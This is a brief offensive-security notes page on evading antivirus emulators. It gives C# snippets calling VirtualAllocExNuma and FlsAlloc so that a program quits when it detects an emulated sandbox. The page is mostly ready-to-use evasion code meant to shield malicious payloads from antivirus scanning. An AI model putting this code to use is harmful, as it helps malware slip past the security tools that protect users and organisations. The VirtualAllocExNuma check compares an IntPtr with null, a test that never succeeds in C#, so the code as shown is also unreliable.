Non-emulated APIs

Bypass AV emulators by implementing NON-emulated WIN32 APIs, these functions will return errors / crash when run emulated -> detecting that it is being run in a simulated environment.

Numa

[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

        [DllImport("kernel32.dll")]
        static extern IntPtr GetCurrentProcess();

IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4,
0);
            if (mem == null)
            {
                return;
            }

FlsAlloc

[DllImport("kernel32.dll")]
        static extern UInt32 FlsAlloc(IntPtr lpCallback);

UInt32 result = FlsAlloc(IntPtr.Zero); 
            if (result != 0xFFFFFFFF)
            {
                return;
            }

Last updated 2 years ago